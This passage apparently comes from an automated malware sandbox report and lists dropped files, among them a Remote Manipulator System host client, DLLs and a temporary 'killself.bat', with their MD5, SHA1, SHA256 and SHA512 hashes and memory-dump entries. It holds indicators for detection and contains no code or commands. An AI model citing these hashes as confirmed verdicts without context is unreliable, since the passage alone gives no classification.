| SHA256 | c0f0b84d587066af8f80f41a7be63b4c01547af3f1e011602ac1b6ee0ac54a2c |
| SHA512 | 0b5b83335c6f602b8397a3c2ae6d1e661d744eb27114463d53e344bf18774ccb38853d314ebe05536d4c28c29fe3fdaba041a6a46983789f064ca70881cfcb85 |
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
| MD5 | 76ebe5fd077a62161d0ab560208b9f94 |
| SHA1 | 614c218d35ba531f0bad791d52e5dcf57df5c742 |
| SHA256 | f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b |
| SHA512 | baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde |
C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll
| MD5 | e38372f576d927f525ef8e1a34b54664 |
| SHA1 | 26af9d1db0a3f91d7fe13147e55f06c302d59389 |
| SHA256 | 4046bd0b93909a41d0fd96f0405a864c79a47f493165546569251c1f73db6b0b |
| SHA512 | 78b7477b000407990304ec37624b873514d4ed9daa1b42fd988707b7374ffab442ba28fe19884724867f3f0f7a5f12f7fc8c228c050115c902d1569e4a3b13c7 |
C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll
| MD5 | 3d0b27b3f8aa22575aa0faf0b2d67216 |
| SHA1 | 39fc787538849692ed7352418616f467b7a86a1d |
| SHA256 | d7782488ef29bf0fd7e8faf0bd24414a6540bf7366434692a5a485d5ae2d7d44 |
| SHA512 | 19f0785d3cecce0dbbb7da1be640bffebe4daedc65a513d1db0b5e533eb96aaa0588831de74c88e5013c00405e03ca4188c4b633e39e6c49ab5c1d1b42191ca8 |
C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll
| MD5 | 292a1748850d1fdc91d4ec23b02d6902 |
| SHA1 | 8f15f1c24e11c0b45b19c82a78f7b79b1e7f932d |
| SHA256 | acf354ad6ed94e876b29a60c5870dd91e7b3f76cc82c1a862c92024a12404a9f |
| SHA512 | cf7579f1169ec21d9bf3c666d416d3fe2a4f9953d4d328b182452e40043f91055d301fd4b4a21454b847dbdb0af6a61c52657caded7d6fd7e88812aceeacf704 |
C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll
| MD5 | 2ddfa39f5c2fd3f00681ef2970617e4b |
| SHA1 | 8152aa18afbacf398b92168995ec8696d3fe3659 |
| SHA256 | f938bdc741ef1d2738b532aef001a160e3a3627ed8a27158b7017ee49fc65791 |
| SHA512 | f89f0f02cda650c138e4ebaef198f0762dfd571ef7d46a6b3710cd93d76bc52a79055c55afca46128a9a84a795a5cb946ca93c492e07cfb503c9b27d96211e20 |
memory/3700-179-0x0000000000000000-mapping.dmp
memory/1848-180-0x0000000000000000-mapping.dmp
memory/1684-181-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
| MD5 | 76ebe5fd077a62161d0ab560208b9f94 |
| SHA1 | 614c218d35ba531f0bad791d52e5dcf57df5c742 |
| SHA256 | f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b |
| SHA512 | baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde |
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
| MD5 | 76ebe5fd077a62161d0ab560208b9f94 |
| SHA1 | 614c218d35ba531f0bad791d52e5dcf57df5c742 |
| SHA256 | f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b |
| SHA512 | baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde |
C:\Users\Admin\AppData\Local\Temp\killself.bat
| MD5 | c2ac85b000427a4a00f19da237aaaf86 |
| SHA1 | 459ecb5e64576348e6c654724e87825772c06ea8 |
| SHA256 | b5157eceaf9b5f6448d15dcfe7011af0b44a4288f7667c5d717f042c2fba1352 |
| SHA512 | e62f711445398b0654e698c4f7d4c75bb8693e901ae99f1cf543f45ccd9532daf27bba1ceb9d180d0379a41c9a62d6ee2df30cd25b9abb05532c551a0fad814b |
memory/2580-185-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
| MD5 | 76ebe5fd077a62161d0ab560208b9f94 |
| SHA1 | 614c218d35ba531f0bad791d52e5dcf57df5c742 |
| SHA256 | f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b |
| SHA512 | baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde |